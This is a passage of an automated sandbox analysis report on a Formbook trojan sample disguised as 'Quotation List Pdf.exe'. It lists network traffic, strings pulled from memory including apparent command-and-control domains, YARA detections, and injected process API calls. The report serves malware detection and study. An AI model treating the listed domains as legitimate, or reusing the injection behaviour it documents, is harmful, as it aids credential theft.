server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:45:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:45:45 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:45:48 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:45:50 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:46:09 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:46:12 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:46:14 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 13:46:17 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:46:23 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:46:25 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:46:28 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 01 Jul 2024 13:46:30 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-d033aba x-version: d033aba x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 01 Jul 2024 13:46:50 GMT keep-alive: timeout=5 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-d033aba x-version: d033aba x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 01 Jul 2024 13:46:52 GMT keep-alive: timeout=5 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-d033aba x-version: d033aba x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 01 Jul 2024 13:46:55 GMT keep-alive: timeout=5 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-d033aba x-version: d033aba x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 01 Jul 2024 13:46:55 GMT keep-alive: timeout=5 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-d033aba x-version: d033aba x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 01 Jul 2024 13:46:57 GMT keep-alive: timeout=5 connection: close
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ajjmamlllqqq.xyz
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ajjmamlllqqq.xyz/5lw2/
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-c
            Source: Quotation List Pdf.exe, 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PING.EXE, 00000007.00000003.1737775029.00000000084B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033aFR
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: PING.EXE, 00000007.00000002.3302803643.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.00000000031C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000023104000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Quotation List Pdf.exe
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0042B323 NtClose,5_2_0042B323
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058535C0 NtCreateMutant,LdrInitializeThunk,5_2_058535C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05852DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05852C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852B60 NtClose,LdrInitializeThunk,5_2_05852B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05854650 NtSuspendThread,5_2_05854650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853090 NtSetValueKey,5_2_05853090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853010 NtOpenDirectoryObject,5_2_05853010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05854340 NtSetContextThread,5_2_05854340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DB0 NtEnumerateKey,5_2_05852DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DD0 NtDelayExecution,5_2_05852DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D00 NtSetInformationFile,5_2_05852D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D10 NtMapViewOfSection,5_2_05852D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853D10 NtOpenProcessToken,5_2_05853D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D30 NtUnmapViewOfSection,5_2_05852D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853D70 NtOpenThread,5_2_05853D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CA0 NtQueryInformationToken,5_2_05852CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CC0 NtQueryVirtualMemory,5_2_05852CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CF0 NtOpenProcess,5_2_05852CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C00 NtQueryInformationProcess,5_2_05852C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C60 NtCreateKey,5_2_05852C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F90 NtProtectVirtualMemory,5_2_05852F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FA0 NtQuerySection,5_2_05852FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FB0 NtResumeThread,5_2_05852FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FE0 NtCreateFile,5_2_05852FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F30 NtCreateSection,5_2_05852F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F60 NtCreateProcessEx,5_2_05852F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852E80 NtReadVirtualMemory,5_2_05852E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852EA0 NtAdjustPrivilegesToken,5_2_05852EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852EE0 NtQueueApcThread,5_2_05852EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852E30 NtWriteVirtualMemory,5_2_05852E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058539B0 NtGetContextThread,5_2_058539B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852B80 NtQueryInformationFile,5_2_05852B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BA0 NtEnumerateValueKey,5_2_05852BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BE0 NtQueryValueKey,5_2_05852BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BF0 NtAllocateVirtualMemory,5_2_05852BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AB0 NtWaitForSingleObject,5_2_05852AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AD0 NtReadFile,5_2_05852AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AF0 NtWriteFile,5_2_05852AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03884340 NtSetContextThread,LdrInitializeThunk,7_2_03884340
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03884650 NtSuspendThread,LdrInitializeThunk,7_2_03884650
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038835C0 NtCreateMutant,LdrInitializeThunk,7_2_038835C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882B60 NtClose,LdrInitializeThunk,7_2_03882B60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AD0 NtReadFile,LdrInitializeThunk,7_2_03882AD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AF0 NtWriteFile,LdrInitializeThunk,7_2_03882AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038839B0 NtGetContextThread,LdrInitializeThunk,7_2_038839B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FB0 NtResumeThread,LdrInitializeThunk,7_2_03882FB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FE0 NtCreateFile,LdrInitializeThunk,7_2_03882FE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F30 NtCreateSection,LdrInitializeThunk,7_2_03882F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03882EE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DD0 NtDelayExecution,LdrInitializeThunk,7_2_03882DD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03882DF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03882D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03882D30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03882CA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C60 NtCreateKey,LdrInitializeThunk,7_2_03882C60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03882C70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883090 NtSetValueKey,7_2_03883090
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883010 NtOpenDirectoryObject,7_2_03883010
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882B80 NtQueryInformationFile,7_2_03882B80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BA0 NtEnumerateValueKey,7_2_03882BA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BE0 NtQueryValueKey,7_2_03882BE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BF0 NtAllocateVirtualMemory,7_2_03882BF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AB0 NtWaitForSingleObject,7_2_03882AB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F90 NtProtectVirtualMemory,7_2_03882F90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FA0 NtQuerySection,7_2_03882FA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F60 NtCreateProcessEx,7_2_03882F60
